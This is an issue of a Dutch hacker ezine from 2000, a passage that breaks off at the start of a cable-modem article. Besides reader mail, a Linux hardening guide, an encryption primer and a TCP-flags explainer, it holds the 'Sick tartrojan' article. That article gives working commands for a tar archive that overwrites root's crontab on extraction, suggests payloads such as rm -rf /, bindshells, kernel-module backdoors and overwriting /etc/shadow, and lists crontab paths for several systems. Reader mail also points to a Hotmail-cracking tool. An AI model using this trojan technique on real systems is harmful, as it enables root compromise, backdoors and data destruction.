___ ___ _____ ___ ___ / | \ / | | / | \ / ~ \/ | |_/ ~ \ \ Y / ^ /\ Y / \___|_ /\____ | \___|_ / \/ |__| \/ +-+-+-+-+-+-+-+ +-+ +-+-+-+-+-+-+-+-+-+-+ |h|a|c|k|e|r|s| |4| |h|a|c|k|e|r|s| |0|7| +-+-+-+-+-+-+-+ +-+ +-+-+-+-+-+-+-+-+-+-+ http://www.hackers4hackers.org '23-03-2000', Momenteel 795 lezers. Om je aan te melden bij de maillijst kan je een mailtje sturen naar subscribe@hackers4hackers.org met als titel "subscribe h4h emailadres" Of je kan je online aanmelden op http://www.hackers4hackers.org Artikelen en dergelijke kun je mailen naar post@hackers4hackers.org Vragen kun je mailen naar de desbetreffende auteur of ook naar post@hackers4hackers.org Uitspraak: [Viper: Hacken is geen LOI cursus of zo.] Enkele interessante sites: http://itris.eu.org http://www.dutchthreat.org http://www.security.nl http://www.hit2000.org http://hier.is/Triples http://www.whatis.com http://viper.dmrt.com Leuke kanaaltjes op IRCnet: #h4h #hit2000 #coders.nl #nlcoders 01. Disclaimer............................................... (Redactie) 02. Inleiding................................................ (Redactie) 03. Lezerspost............................................... (Redactie) 04. Linux Security guide voor: Linux newbie's................ (LordRaYden) 05. Inleiding tot encryptie (deel 1)......................... (Zym0t1c) 06. Sick tartrojan........................................... (drgenius) 07. TCP/IP Flags............................................. (Neon-Lenz) 08. Evenementen.............................................. (Redactie) 09. Zenith Kabelmodem........................................ (Hit2000) 10. Eindwoord................................................ (Redactie) ------------------------------------------------------- 01. Disclaimer ------------------------------------------------------- We zijn niet verantwoordelijk voor datgene wat jullie met deze informatie doen. Deze informatie dient alleen voor educatieve doeleinden. Als je in problemen komt, kan je ons niks verwijten. Gebruik maken van deze informatie kan strafbaar zijn. Meningen van auteurs hoeven niet hetzelfde te zijn als die van de redactie. Correspondentie met de redactie is mogelijk per email : Algemeen - post@hackers4hackers.org Asby (Hoofdredacteur) - asby@hackers4hackers.org Berry (Website + Eind redactie) - berry@hackers4hackers.org Tozz (Redactie) - tozz@hackers4hackers.org Viper (Redactie) - viper@hackers4hackers.org Nighthawk (Redactie + Lezerspost) - nighthawk@hackers4hackers.org ------------------------------------------------------- 02. Inleiding ------------------------------------------------------- De nieuwe site is nu deels vernieuwd. We hebben het archief opnieuw ingedeeld. En de delen uit elkaar getrokken in losse hoofdstukken. De komplete h4h is nu enkel nog als een ZIP file te downloaden. Ook is er een search engine aanwezig om snel een bepaald artikel te zoeken. Er is ook een nieuw redactielid bij gekomen. Zijn nickname is NightHawk (volgens gerrie een moeilijke naam) en hij zal actief meewerken aan de redactionele artikelen. Dit is nodig omdat de poll op die op de site gehouden is aangeeft dat de meeste lezers er prijs op stellen dat h4h kleiner en vaker gaat verschijnen! Hieronder volgt de uitslag van die poll: H4H Moet kleiner en vaker: Mee eens 72.9% - (54 Votes) Mee oneens 27% - (20 Votes) Totaal aantal stemmen: 74 De meeting van 4 maart was een groot succes en zeker voor herhaling vatbaar. Er zijn 29 mannen + vrouwen (jaja) ondanks dat het carnaval was gekomen. Een verslag van de meeting zal in het volgende nummer komen te staan. Op IRCnet in ons kanaal #h4h zit tegenwoordig ook een FILEBOT aan deze bot kan je ook delen van h4h vragen.. (als hij aanwezig is... sorrie rippie) Deze zal hij je vervolgens keurig DCC'en. Ook de redactie loopt steeds vaker rond in dit kanaal... Dus ideeën en tips... Of voor een chat met de redactie kan je daar terecht. We zijn ook op zoek naar een sponsor voor de website. Deze zou bijvoorbeeld een banner op de site kunnen plaatsen en evt een reclame tekstje in de delen. We willen absoluut geen reclame site die vol staat met banners enz. worden maar een beetje reclame inkomsten om de kosten van de redactie voor de site te drukken en op de volgende meeting de lezers een biertje aan te bieden zou wel zo gewenst zijn. Tozz zal de komende maanden uitgeteld zijn. Er is een bus tegen zijn brommer aangereden en nu moet hij daar eerst van bij komen (sorry tozz). We wensen hem namens de redactie beterschap en hopen dat je snel uit het gips bent om weer te gaan schrijven =) We wensen iedereen veel leesplezier toe en mochten er op of aanmerkingen zijn, surf dan even naar onze website en vul het in bij commentaar. De redactie ------------------------------------------------------- 03. Lezerspost ------------------------------------------------------- [Door Nighthawk] -- Hoe krijg ik ****** een emailadres gekraakt? [ Voor een email adres geld hetzelfde als bij de ip's. Het duid slechts aan waar de mail naartoe moet. Ik neem aan dat je iemand zijn email account wilt kraken. Zal waarschijnlijk ook weer een Hotmail adres zijn.. Ik raad je aan op internet te zoeken naar "Hacktool" daarmee kan je nu ook hotmail account kraken. En ik denk dat wij eerder reden hebben om die ****** te gebruiken omdat figuren zoals jij dit soort dingen blijven vragen...... ] Please say it to me... [ I just did, by the way: why suddenly speaking in english? We are a dutch ezine.. ] FNCRABG6 [ N|ghtHawk ] -- > Ontvang Hackers 4 Hackers zodra hij verschijnd door je toe te voegen aan de mailing list het is dan wel "verschijnt" dat soort foutjes zitten er trouwens wel meer in de archive's de info is verder wel o.k. [ Berry: ja, iemant heefd mijn t en d doeds van mijn doedsenbort omgetraait ] [ Hawk: en aangezien berry geen idee heeftwaar hij ze terug moet plaatsen (*zucht*) hebben we een serieus probleem ] JvH [ NHvH4H ] -- H asby, [ Zippie, alleen geen Asby het is N|ghtHawk dit keer die de twijfelachtige eer heeft je te woord te staan.. ] Ik heb een paar geintjes van een vriend gehad. Zou je mij even terug willen mailen met nog een paar geintjes? [ Geintjes? Nou vooruit, hier is er eentje omdat ik weinig tijd heb.. Wat is de overeenkomst van Geld en Schaamhaar? --> Het groeit allebei niet op je rug ] Alvast bedankt Zippie [ Alvast graag gedaan, N|ghtHawk ] -- Hallo [ Hee ] ik ben een begginer [ je geeft het tenminste al toe, dat is al een begin ] en wil meer te weten tekomen over IP-adresen [ Wat wil je weten? Hoe ze eruit zien? Hoe ze voelen? ] en hoe je die moet hacken [Zoals we al eerder hebben moeten melden, kan je ip's niet hacken, dit is slechts een "getal" waaraan je computer kan worden herkend...] Ik wou het op de manier met betroking van ICQ [ Mjah, heb ik ook wel eens, Hint: lees je eigen mailtjes ff na op vage zinnen ] als ik zo'n IP nummer heb wat moet ik dan moet ik dan een programa downloaden of iets anders [ Dat ligt eraan wat je ermee wilt gaan doen. Als je ze wilt sparen heb je alleen een opschrijfboekje nodig. ] Dankje Joppe [ Graag gedaan, N|ghtHawk ] -- Ik vind de Lay-out een beetje makkelijk, storten jullie je eens wat meer op HTML. [ Dat is niet de opzet van onze site.. En denk ook eens aan de lynx gebruikers. De inhoud van onze site zijn de artikels, niet het uiterlijk.. Dagelijks wordt ons gemeld dat het mooier moet en iedereen het wel beter ken. Als jullie betere artikels kunnen schrijven, dan mag je commentaar geven.... ] Ideen : wwwhack password lists [ *snik* ] Hoeba de Koeba [ N|ghtHawk ] ------------------------------------------------------- 04. Linux Security guide voor: Linux newbie's. ------------------------------------------------------- Linux dichtspijkeren voor hackers. (newbie version) Voor: Redhat Linux 6.0. Deze gids is alleen geschikt voor LINUX STAND ALONE PC'S (wel met Dialup) maar geen network stations of servers! Als je linux voor de eerste keer installeert is het meestal zo hackbaar als een Windows systeem In deze tutorial zal ik uitleggen hoe je Linux redelijk goed kuntdichtspijkeren. Deze gids is niet voor Elite maar is vooral gericht op de pro-newbie hacker. Een elite versie zal ook komen maar aangezien ik d'r nog wel even zoet mee ben, moet je het toch maar even doen met deze versie. INSTALLATIE Als je linux installeert installeer dan geen SERVER packages (anonymous FTP Server etc. Deze kunnen je systeem open zetten voor hackers en dat gevolg kan hebben dat ze de /etc/passwd file "rippen" want niet echt leuk is. En daarbij moet je je passwords ook shadowen, dit kun je doen door een vinkje te zetten voor "use shadow passwords" in de redhat setup (Als je linux installeert). TCP/UDP Poorten sluiten. Als we Linux geinstalleerd hebben, downloaden we Nmap (www.insecure.org/nmap) en installeren deze als ROOT, vervolgens ga je terug naar je gewone account (bv Lordrayden) en typt daar op de console: nmap -sT localhost Dit kleine tooltje (nmap) list alle open poorten op je systeem. ik zij bij mij dat de poorten 25,21,79,98, open zijn. Als je een beetje verstand hebt van TCP/IP weet je wat deze poorten betekenen. We beginnen bij poort 25, Meestal SMTP Protocool en als we telnetten kunnen we vrolijk mailen naar andere adressen,niet echt iets ideaal dus, Dus we loggen in als root, typen setup en enter en kiezen voor system services en drukken op enter, daar staan allemaal de services die je linux systeem telkens boot, Ergens ertussen staat de service: sendmail, daar staat een vinkje voor haal het vinkje weg en je poort 25 is closed Alle overige poorten die er mochten staan zie INETD.CONF INETD.CONF Deze stappen moet je heel zorgvuldig doorlopen!. Wat ik hieronder ga beschrijven beschadigt in de eerste instantie je Linux systeem NIET. Dit is een paardenmiddel om alle poorten in Linux te sluiten. 1. Je logt in als root. 2. start de X-Server 3. opent met een of ander tekstverwerkertje, /etc/inetd.conf (bv emacs /etc/inetd.conf 4, In deze file staat een listing van alle poorten op je Linux systeem, voor een bepaald aantal poorten een # staat, 5. Zet voor ELKE regel in /etc/inetd.conf een #. 6. Save de file 7. Reboot je systeem, 8. Controleer met Nmap wederom of de poorten in je systeem dicht zijn. OVERIGE TIPS. = Ga NOOIT als root het internet op!, als ze bij jou binnen komen heb je een probleem! = Accepteer nooit van een onbekende op het internet, of IRC een SCRIPT of proggje. tenzij je hier verstand van hebt!, Deze scripts kunnen poorten opzetten! = Probeer af en toe het WHO command op de console, met dit commando kun je zien wie er allemaal op je systeem is ingelogd, I WANT MORE SECURITY!! Dan zou ik aanraden om een firewall te instaleren (bv bastille linux) maar deze zijn heel erg uitgebreid in de configuratie en zeker niet geschikt voor de newbie. In de eleete versie zal ik wel dit soort stappen behandelen. Nmap Nmap kun je ook gebruiken om andere hosts of clients mee te scannen, experimenteer maar met het programma na een tijdje zul je zien dat het best wel "vet" is. Sommige commando's van NMAP vereisen root priveleges, deze kun je gewoon krijgen met SU, (su root) LordRaYden lordrayden@x-stream.nl UIN: 46682071 IRC: #hit2000 #csd ------------------------------------------------------- 05. Inleiding tot encryptie (deel 1) ------------------------------------------------------- Legal shit & andere shit Niks van dezen text mag gewijzigd worden zonder toelating van den auteur. Verspreid em zoveel ge wilt, print em desnoods uit en hangt em in uw WC, één ding vraag ik gewoon: laat dezen disclaimer staan, no mather what! Stukken uit dezen text zijn wa geïnspireerd op da boek van William Stallings, "Cryptography and Network Security - Principles and Practice - Second Edition" en nog enkele andere docs die kunnen gevonden worden op het net. De indeling (ook enkele voorbeelden) heb ik deels overgenomen uit da boek. Losers die hierop commentaar hebben en denken 'Ja, zo kan ik ook nen text ineen flansen!': wel, doeget dan zelf! Commentaar geven is heel gemakkelijk als ge zelf niks wilt doen. Dienen boek is heel goe geschreven, en ik doen toch de moeite om het in verstaanbare taal te schrijven. Wat zit ik hier eigenlijk te doen? Ik moet mij hier helemaal ni verontschuldigen... Opmerkingen, bijvulsels, verbeteringen of andere zinvolle suggesties mogen altijd doorgemaild worden naar zym0t1c@hotmail.com, andere shit naar dev/null. Spread (crack) the word people! Ter nader info Als alles goe gaat, dan zal ik een stuk of vijf delen schrijven over encryptie. Wie weet worden er da meer, wie weet minder... In 't eerste deel (dees dus) probeer ik -in simpele woorden- uit te leggen wa encryptie eigenlijk is plus de mogelijke 'attacks' hierop. De voor- en nadelen van encryptie worden ook tegen elkaar afgewogen voor hen die er geen benul van hebben waartoe encryptie kan leiden... Het tweede deel beschrijft de 'klassieke' encryptietechnieken -zowel de substitutie (Caesar Ciphers, Monoalphabetic Ciphers, Playfair Ciphers, Hill Ciphers en Polyalphabetic Ciphers), de transpositie (Transposition Ciphers) als rotor machines... Hopelijk hebde genoeg kaas gegeten van wiskunde... ;) Vanaf 't derde deel pushen we het niveau fameus op. Hier beschrijf ik vooral de 'moderne' -en meest gebruikte- encryptietechniek DES. Feistel Ciphers komen trouwens ook aan bod. In 't vierde deel sluit ik de 'conventionele' encryptietechnieken af. Hier komen (waarschijnlijk) triple DES, IDEA, Blowfish, RC5, CAST-128 en RC2 aan bod. Het vijfde (en misschien laatste) deel geeft een inleiding tot 'publieke sleutel' encryptietechieken zoals RSA, Diffie-Hellman en Elliptic Curves. Ik weet ni wanneer een deel gaat afgewerkt zijn en dus moet ge daarover ook geen mails sturen (ik heb ook nog andere zaken te doen). Ik kan ook ten allen tijde mijn indeling veranderen, daar moet ge dan gewoon maar mee leren leven! Allez kom, on with the show... Encryptie: wa is da? Encryptie is nen techniek die toegepast wordt om betrouwbare informatie uit te wisselen tussen één, twee of meer (betrouwbare) personen. Ja, ge moet er dus helemaal ni vanuit gaan da elke persoon die gij vertrouwt wel degelijk betrouwbaar is, anders kunde nog lelijk verschieten... Be paranoid man! Encryptie wordt vooral toegepast om bedrijfsspionage tegen te gaan, of om bezwarende info uit te wisselen, of om hackers te kloten (crackers?), ... Alles wa ge doet om iets onbruikbaar te maken, voor mensen die er natuurlijk niks van mogen weten, kunde beschouwen als één of andere vorm van encryptie. Hierdoor bestaat encryptie dan ook in geuren en kleuren. Da laatste klopt ni echt... Eigenlijk hebde maar drie soorten: ten eerste hebde de steganografie, ten tweede de conventionele encryptie en ten derde hebde nog de encryptie via publieke sleutels. Encryptie is -officieel gezegd- het proces waarbij ne plaintext via bewerkingen aan de hand van ne sleutel omgezet wordt tot ne ciphertext. Decryptie is het proces waarbij ne ciphertext via bewerkingen aan de hand van diene zelfde sleutel te gebruiken, omgezet wordt tot de plaintext. Enkel zij die diene sleutel (en eventueel het paswoord) hebben, zouden de ciphertext moeten kunnen decoderen. Stelde de ciphertext gelijk aan Y, de plaintext gelijk aan X, het encryptieproces gelijk aan E, het decryptieproces gelijk aan D en de sleutel gelijk aan k, dan komde gemakkelijk tot de volgende twee simpele wiskundige formules: Y = Ek(X) en X = Dk(Y). By the way, ne plaintext is gewoon den originelen text, en ne ciphertext is de versleutelden text (gecodeerd dus). Bij encryptie gaat iedereen ervan uit dat de encryptiemethode sowieso gekend is. Alle encryptietechnieken kunde gemakkelijk vinden op 't net. Zolang da er info wordt achtergehouden via beveiliging hierop, zijn er mensen die da proberen (en kunnen) kraken. Brute force cracking is zonen techniek die veel wordt gebruikt. Hierbij probeerde gewoon alle mogelijke sleutels uit totda ge de plaintext vindt. Dezen techniek wordt trouwens het meest gebruikt bij cracking contests en dergelijke. Ge kunt da ook vergelijken met brute force hacking (uitproberen van alle mogelijke paswoorden op een account via dictionaries). Om brute force cracking praktisch onmogelijk te maken (lees: enorm tijdrovend) moet diene sleutel onmogelijk te vinden zijn! De kracht van de encryptie hangt eigenlijk volledig af van de grootte van diene sleutel. Efkes een klein overzicht van den tijd die ge nodig zou hebben om ne sleutel van een bepaald aantal bits brute force te kraken: +----------------+------------------+-----------------+------------------+ | Sleutelgrootte | Aantal mogelijke | Nodige tijd aan | Nodige tijd aan | | (bits) | sleutels | 1 encryptie/µs | 1E6 encryptie/µs | +----------------+------------------+-----------------+------------------+ | 32 | 2^32=4,3E9 | 35,8 minuten | 2,15 millisec | | 56 | 2^56=7,2E16 | 1142 jaren | 10,01 uren | | 128 | 2^128=4E26 | 5,4E24 jaren | 5,4E18 jaren | | 26 letter | 26!=4E26 | 6,4E12 jaren | 6,4E6 jaren | | (permutatie) | | | | +----------------+------------------+-----------------+------------------+ Ge moet weten da de sleutel ergens helemaal in 't begin kan liggen of helemaal aan 't einde. Ge kunt stellen da ge gemiddeld den helft van alle sleutels moet uitproberen om succes te oogsten. Cryptanalyse is gewoon het hele proces van het (proberen te) kraken van ne ciphertext. Steganografie Steganografie kunde eigenlijk ni echt beschouwen als encryptie. Ge doet geen *echte* bewerkingen op ne plaintext via sleutels zoals da ge wel doet bij de andere twee vormen. Hierdoor krijgde ook genen cyphertext. Steganografie is simpelweg het onzichtbaar maken van ne plaintext. Er bestaan denk ik duizend en één technieken waarmee ge da kunt bekomen (onzichtbaren inkt, schrijven met citroensap op papier, elken eerste letter nemen van elk woord in nen tekst, ...) maar 'k ga der hier ni dieper op in gaan, behalve ene (modernen) techniek die ik echt machtig vind en da vandaag den dag ook wordt toegepast. Ik veronderstel da ge al ne keer gehoord hebt van Kodak Photo CD's. De maximum resolutie daarvan is 2048 op 3072 pixels (tot nu toe althans). Elke pixel bevat 24 bits aan RGB info. Stel nu da ge de waarde van de minst betekenenden bit (snapte da vorig woord en is da juist?) van elke pixel vervangt door een andere waarde. (Geen nood: ge merkt daar ni veel van op den originele foto.) Awel, zo kunde dus ne plaintext van 2,3 mega's verbergen in elken digitale Kodak foto! Cool he? Conventionele encryptie Alle conventionele technieken die in 't tweede, 't derde en 't vierde deel besproken worden, werken allemaal rond 't zelfde principe, aan de hand van ne sleutel. Alle zaken die hierboven beschreven staan (zie 'Ter nader info') komen allemaal vrij uitgebreid aan bod. Na de klassieke komen de moderne technieken aan bod. DES (Data Encryption Standard) is hiervan de meest bekende en is wereldwijd de meest gebruikten techniek. UNIX en Linux baseren hun paswoordverificatie hier trouwens op. Publieke sleutel encryptie Het grootste verschil tussen publieke sleutel encryptie en conventionele encryptie is het gebruik van meerdere sleutels. Bij conventionele encryptie wordt er enkel ene sleutel gebruikt in tegenstelling tot de publieke sleutel encryptie waarbij twee sleutels worden gebruikt (ne geheime sleutel en ne publieke sleutel). Via de publieke sleutel van nen andere te gebruiken op ne plaintext kan (hopelijk) enkel en alleen diene gast van wie diene publieke sleutel is, diene ciphertext decoderen. Hier gaan we ervan uit da de publieke sleutel ook gekend is, dus moet de private sleutel zo geheim mogelijk gehouden worden. Attacks Zoals ge al gelezen hebt, is cryptanalyse het (proberen te) kraken van ne ciphertext. Brute force cracking was al kort besproken. Er bestaan -in grote lijnen- vijf mogelijke attacks: Cyphertext only, Known plaintext, Chosen plaintext, Chosen Ciphertext en Chosen text. Afhankelijk van wa de analyst al weet van de cyphertext zal em kiezen welken te gebruiken... Vrij logisch toch maar den analyst heeft altijd de ciphertext in zijn bezit. Gewoon ff om te vermelden. =) Cyphertext only zal praktisch ni worden gebruikt. In dees geval heeft den analyst de minsten info (gebruikten techniek en de ciphertext). Dees is de meest gunstige voor iedereen behalve den analyst, maar zal weinig voorkomen. Known plaintext zal gebruikt worden als den analyst ideeën heeft van mogelijke stukken plaintext. Ge kunt bijvoorbeeld redelijk veel info verkrijgen door ne file te editeren en zijn structuur te bekijken. EPS- files, ZIP-files, Word-files, ... beginnen altijd met dezelfden info. Via dezen info kunde u een beter beeld vormen van de sleutel en kunnen de grenzen waartussen de sleutel ligt gemakkelijk beperkt worden. (Bij wijze van spreken althans! =)) Algemeen bekend is da nen bepaalden techniek sowieso bestand is tegen ne Known plaintext attack. Chosen plaintext kan simpel worden uitgelegd: heeft den analyst de mogelijkheid om te kiezen welken plaintext moet versleuteld worden en deze ook te versleutelen, awel, dan kan hij hierdoor een beeld krijgen van de structuur van de geheime sleutel. Chosen ciphertext en Chosen text worden veel minder gebruikt, dus leg ik die ook ni verder uit. Ge vindt er trouwens ni veel info over op het net. De bovenste drie zijn eigenlijk de meest gebruikte. Voor- en nadelen van encryptie + enkele opmerkingen Mensen die te weten komen da ge iet encodeert kunnen beginnen denken da ge iet te verstoppen hebt voor hun en/of anderen. Toegegevens of niet: als ge iet voor ogen krijgt da onleesbaar, verstopt of geëncodeerd is, dan krijgde meestal de idee om te willen weten wa ge zogezegd ni zou mogen weten. Gezonde nieuwsgierigheid noemen ze da, denk ik. Geef nu toe: als ge iet ni moogt weten, of als iet ni bedoelt is voor uw ogen, dan wilde toch gewoon weten wa da zou kunnen zijn. Die nieuwsgierigheid, die need- to-know, da knaagt toch. Ge kunt natuurlijk altijd als ne goeien burger door 't leven gaan en er u voor de rest niks van aantrekken, maar waar is dan in godsnaam het plezier nog te vinden? ;) Wel dus, pas op met de zaken die ge encodeert. Soms doede er goe aan, soms ook helemaal ni. Stelt u voor dat uwen baas erachter komt da ge vanalles zit te encoderen wat hij ni mag weten, ge zou wel ne keer rap kunnen vliegen... Ook moet ge altijd zien da ge zowel uwe geheime sleutel als het gebruikte paswoord ni vergeet. Nu moogde uw eigen zo goe beschermen tegen hackers, crackers of wat dan ook: zie gewoon da ge uzelf ni buitensluit. Houdt altijd een kopie van uwe sleutel bij en een kopie van uw paswoord. Ergens op een veilige plek waar ge zeker van zijt da niemand eraan kan. Zet da ni op diskette met ne label 'PGP key' of iet dergelijks; ge kunt dan evengoed uw gegevens ni encoderen. Wa ik bijvoorbeeld zou doen is ergens in een bank ofzo een geheime kluis huren en daar een diskette in opbergen met een kopie van diene sleutel. Ik stel ook voor da ge die diskette compresseert met laat ons zeggen WinZip omda ge daarbij tijdens de compressie ook een paswoord kunt meegeven. Stel nu nog da ze die diskette te pakken krijgen, dan moeten ze eerst en vooral da paswoord van Winzip proberen te vinden vooralleer ze uwe sleutel kunnen gebruiken. Maakt het hun dus zo moeilijk mogelijk! Voor de mensen met een paardenverstand: ge kunt ook altijd uwe geheime sleutel editeren met nen hexeditor ofzo en alle tekens van buiten leren. Dan kunde uw diskette weg smijten en als ge ooit uwe sleutel zou kwijtgeraken, dan maakte ne nieuwe ASCII-file aan en typt ge al die tekens in de juiste volgorde in. Is't da ge geen fout hebt gemaakt, awel dan hebde een kopie van uwe sleutel. Deze methode raadt ik echter af, tja, waarom zou da zijn? Maar hoe maakt ge nu een kopie van ne geheime sleutel zonder da iemand er gemakkelijk aankan? Ge kunt natuurlijk iet heel simpel doen... Stel, da ge kunt programmeren. Neemt nu bijvoorbeeld de taal C. (Da kan normaal gezien geen enkel probleem zijn omda hier in H4H ne redelijk goeie C-tutorial wordt gepubliceerd. ;)) C-taal is trouwens simpel. Wa ge bijvoorbeeld kunt doen is een klein proggie maken waarin da ge de file van uwe geheime sleutel opent, elk karakter verandert door een ander en vervolgens diene file terug saved. Dan geefde diene file bijvoorbeeld nen andere naam en saved diene ergens waar mensen ni veel argwaan over zullen hebben. Nu, als ge uwe geheime sleutel dan ooit nodig hebt, dan gebruikte gewoon een variant van da klein proggie die elke veranderde letter terug verandert in den oorspronkelijke. Een simpel iets da ge kunt doen is bij elk karakter bijvoorbeeld 32 bij te tellen. Uw ander proggie moet dan gewoon van elk karakter 32 aftrekken en ge hebt terug uwen originele sleutel. Het spreekt vanzelf da ge da proggie ne naam geeft da ni aanzet tot het verdenken van iet. Ik denk juist nog aan iets: in alle C-tutorials wordt als eerste proggie het bekende "Hello world" gemaakt. Nu, ge laat da proggie tijdens da het uwe sleutel aan't veranderen is, "Hello world" op't scherm printen en niemand zal iet verdenken. Ze zullen hooguit denken da ge leert programmeren. Goed he? =) Ge moet ook oppassen met wa ge encodeert. Ni alles is bezwarend en ni alles wa misschien belangrijk is moet perse geëncodeerd worden. Is't da iemand die gegevens onderschept, dan kan diene vanalles beginnen verdenken omda ge da toch encodeert. Ik bedoel gewoon: van de moment da ge iet encodeert, zijt zeker wa ge ermee doet. In Frankrijk was het encoderen van gegevens tot voor kort trouwens bij wet verboden. Ik heb het al veel gezegd en herhaald, en da mag misschien op gezaag lijken, maar pas op met het paranoid zijn. Ge kunt simpele text-bestanden beginnen encoderen die helemaal ni belangrijk en/of bezwarende info met zich meebrengen, maar als bijvoorbeeld de flikken er ooit achter komen da ge vanalles zit te encoderen, hoe onschuldig ge ook moogt zijn, ze kunnen u daardoor beginnen verdenken omda ge gegevens achterhoudt. Niemand houdt daar trouwens van, en zeker en vast de flikken ni. Als de flikken iemand kunnen kloten, geen nood: dan doen ze da ook! Nog zo'n stomme anekdote: vroeger (enkele jaren geleden) was da hier bij ons precies de gewoonte van de flikken om mij op straat tegen te houden en te beginnen kakken over het feit of ik al dan niet shit of zoiet op zak zou hebben. En hoeveel keer ge ook zei da ge niks op zak had, het enige wa ge daarmee bekomt is da ze gewoon ambetanter worden in de hoop da ze u ook maar voor iet kunnen oppakken. Die klootzakken van... Whoops, da heeft hier helemaal niks meer mee te maken, maar bon, iedereen weet da: den helft van den tijd zijn flikken gewoon rasechte klootzakken. Ter achter info =) Voilà, da was dus mijn eerste deel. Dus, zoals reeds vermeld vanboven, als ge iet interessants te zeggen hebt, bijvulsels, opmerkingen, verbeteringen, andere mogelijke vormen van het geheim houden van sleutels of wat dan ook, awel, dan moogde die altijd doormailen naar: zym0t1c@hotmail.com Geen enkel idee wanneer het volgende deel uitkomt, het enige da ik met zekerheid kan zeggen is da het zeker en vast binnen de komende maanden zal zijn (waarschijnlijk zal H4H ook het volgende deel publiceren). ------------------------------------------------------- 06. Sick tartrojan ------------------------------------------------------- Even een kleine beschrijving hoe je tar kunt gebruiken voor iets leuks (te lui om een 500k tekstbestand te schrijven) TAR staat voor Tape ARchive, het lijkt misschien een programma dat weinig schade toe kan brengen, maar het heeft een leuke feauture. Het mooiste van TARfiles is dat je symlinks kan toevoegen aan een Archive. Een TARfile kan elk bestand overschrijven op je systeem als je TAR uitpakt als root (!!). Je maakt een symlink in een directory (bijv. /test) die naar het bestand dat je wilt overschrijven wijst (bijv. /var/spool/cron/crontabs/root Als een test zou dit dus zijn: # ln -s /var/spool/cron/crontabs/root /test/root en vervolgens: # tar -cvf test.tar * Nu heb je de symlink naar /var/spool/cron/crontabs/root in je tarfile. Nadat je dat gedaan hebt, maak je een 'root' file (jouw crontab) en voegt het aan de TARfile toe met: # tar -rf test.tar root De 'root' file schrijft over de symlink heen als de file wordt ge-untarred, want het komt na het uitpakken van de symlink (en schrijft dus zo over het bestand waar de symlink naar wijst) Nu heb je een TARfile die crontab root overschrijft als ie uitgepakt wordt, dus je kan cron elk commando geven op het systeem, of je kan backdoors starten (kernel modules) en zelfs na het uitvoeren kan je de cron, symlink en rootfile zichzelf laten verwijderen. Wat ik deed (om het verhaal kort te houden) met voorbeeld m00 (bestand) is het volgende: (natuurlijk werkt het alleen als root het TAR commando gebruikt) # mkdir test # mkdir test2 # cd /test2 # echo test > /test/m00 # ln -s /test/m00 /test2/m00 # pwd /test2 # tar -cvf test.tar * # ls m00@ test.tar # rm m00 # ls test.tar # echo het werkt > m00 # tar -rf test.tar m00 # ls m00 test.tar # rm m00 # ls test.tar # cat /test/m00 test # tar -xvf test.tar m00 m00 # cat /test/m00 het werkt # :-) /* EVIL MODE */ Natuurlijk kan je zo'n tar nu vol stoppen met zieke grappen zoals rm -rf / of insmod'en van kernel modules, zodat je een mooie backdoor krijgt. Paswoorden aanpassen.. , bindshells activeren enzovoorts. Tevens kun je een tweede link & file meetarren om die als script te laten starten door cron. Link hem bijvoorbeeld naar /tmp/.blaat dan weet je de exacte locatie om in de cron te zetten, daar je nooit weet waar root de tarfile uitpakt. Of je laat de tar gewoon /etc/passwd en /etc/shadow overschrijven. /*END OF EVIL MODE */ De meeste OS'en gebruiken verschillende crontab-locaties. Hier een lijstje van enkele OS'en: Slackware: /var/spool/cron/crontabs/root Redhat: /var/spool/cron/root SuSe: /var/spool/cron/tab/root SunOS: /var/spool/cron/crontabs/root Debian: /var/spool/cron/crontabs/root FreeBSD: /var/spool/cron/tabs/root Wijze les: Pak geen files als root uit drgenius ======== Grtz to #phreak.nl and h4h theinsanedrg@geocities.com ------------------------------------------------------- 07. TCP/IP Flags ------------------------------------------------------- Ik heb dit stukkie geschreven om jullie te introduceren in de flags van TCP-headers. Ik hoop dat jullie hier wat van leren, en zo niet... pech gehad dan. ;-) Laten we maar beginnen: De TCP-header bevat 6 velden met 1 bit flags. De 6 velden in een TCP-header zijn: URG = Deze flag laat de ontvangende TCP-module weten dat het veld voor "Urgent Pointer" wijst op urgente data. (De TCP-Module moet eerst de urgente data verwerken voor de rest van alle data). ACK = Deze flag laat weten dat het veld ACK-Nummer een geldige ACK-Nummer heeft. Dit zorgt ervoor dat de TCP de data vertrouwd. PSH = Deze flag heet PUSH. Als deze aan staat, dan moet de TCP-module de data direct van dit deel naar het doel sturen. Normaal zou de TCP-module de inkomende data in een buffer houden en ze sturen tot de buffer van het doel vol is. De PSH-flag laat de TCP-module weten dat de data van dit deeltje niet eerst naar de buffer hoeft. Bijvoorbeeld Telnet-applicaties gebruiken deze flag. Daardoor stuurt TCP de toetsaanslagen van de user direct naar de Telnet-server. Hierdoor ziet de gebruiker zijn getypde letters direct op het scherm, zodat het makkelijk werken is. RST = Deze flag vraagt de ontvangende TCP-module om de connectie te herstellen (reset). TCP stuurt een msg met deze RST-flag als er problemen zijn ontdekt met de connectie. De meeste applicaties stoppen als ze deze flag ontvangen, maar het is mogelijk met behulp van de RST-flag's uitgebreide algoritme's te schrijven die programma's kan laten herstellen na een crash in hardware of software. SYB = Deze flag geeft de ontvangende TCP-module instructies om bepaalde nummers te synchronizeren. TCP gebruikt deze flag om de ontvangende TCP-module te laten weten dat de sender nieuwe data wil sturen. FIN = Deze flag laat de ontvangende TCP-module weten dat de zender klaar is met sturen. Deze flag stopt de data-stream in een richting. De Ontvangende TCP-module moet ook een msg sturen met de FIN-flag om de connectie helemaal te sluiten. Zo, dit was een korte introductie in TCP-flags, voor meer informatie raad ik aan om RFC's, andere boeken, text-files en documenten over TCP/IP te lezen. Spreaded by Neon-Lenz® and The Millennium Hackers Association. Copyrighted and All Rights Reserved® E-Mail:neonlenz@hackermail.net -2000- http://www.mha1.8m.com Vertaald door H4H, 2000 ------------------------------------------------------- 08. Evenementen ------------------------------------------------------- Helaas ,voor de meeste is het wachten op de volgende www.hit2000.org Hier een overzicht van de aanstaande evenementen. TILF-meeting URL: http://tilf.ods.org Datum 14/04/2000 tm 15/04/2000 Locatie Haarlem HOPE 2000 URL: http://www.h2k.net Datum: 14/07/2000 tm 16/07/2000 Locatie: New York, New York Hotel Pennsylvania Defcon 2000 URL: http://www.defcon.org Datum: 28-07-2000 tm 30-07-2000 Locatie: Las Vegas, Nevada USA Weet jij nog IT / Security evenmenten op te noemen mail het dan door naar h4h-redactie@hackers4hackers.org ------------------------------------------------------- 09. Zenith Kabelmodem ------------------------------------------------------- [Dit artikel is Annoniem binnen gekomen via bronnen rondom HIT2000 (waar vrijwel alle leden over kabelmodem 